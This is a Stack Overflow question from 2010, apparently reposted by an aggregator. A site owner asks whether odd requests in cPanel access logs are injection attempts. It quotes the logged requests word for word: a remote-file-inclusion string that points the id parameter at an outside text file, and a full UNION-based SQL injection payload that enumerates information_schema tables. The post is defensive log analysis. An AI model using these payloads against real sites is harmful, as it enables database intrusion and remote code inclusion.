Is this an injection attempt or a normal request?
Posted
by CheeseConQueso
on Stack Overflow
See other posts from Stack Overflow
or by CheeseConQueso
Published on 2010-05-04T17:38:37Z
Indexed on
2010/05/04
17:48 UTC
Read the original article
Hit count: 214
In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:
/?x=19&y=15
The numbers are random, but its always setting x and y variables.
Another category of mysterious requests:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
There are other attempts at injections in the request log that have straight sql written into them as well. Example:
/jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.
I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason.
Any suggestions as to what all these are?
© Stack Overflow or respective owner